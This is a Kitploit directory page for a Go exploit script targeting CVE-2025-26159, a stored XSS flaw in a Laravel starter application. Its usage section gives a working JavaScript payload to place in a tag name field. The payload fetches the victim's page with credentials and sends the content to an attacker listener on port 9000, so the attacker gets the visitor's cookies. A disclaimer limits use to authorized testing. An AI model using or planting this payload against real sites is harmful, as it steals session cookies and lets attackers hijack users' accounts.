Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-26159 — Go-based exploit script for CVE-2025-26159 that decodes, filters, and extracts cookies from Laravel applications via stored XSS payload injection. | Kitploit
Tools/GitHubGitHub/godbadtry/cve-2025-26159
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubgodbadtry/cve-2025-26159

CVE-2025-26159

Go-based exploit script for CVE-2025-26159 that decodes, filters, and extracts cookies from Laravel applications via stored XSS payload injection.

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-26159

This script may only be used in authorized environments where explicit permission has been granted. The author is not responsible for any misuse, damage, or consequences resulting from the use of this script.

This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.

Usage

To understand the explotation steps check out this post on my blog.

root@kitploit:~
go run CVE-2025-26159.go

In the tag name field of laravel starter add this payload:

root@kitploit:~
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

After a user visits the malicious tag's detail page, you will get his cookies.

Download Tool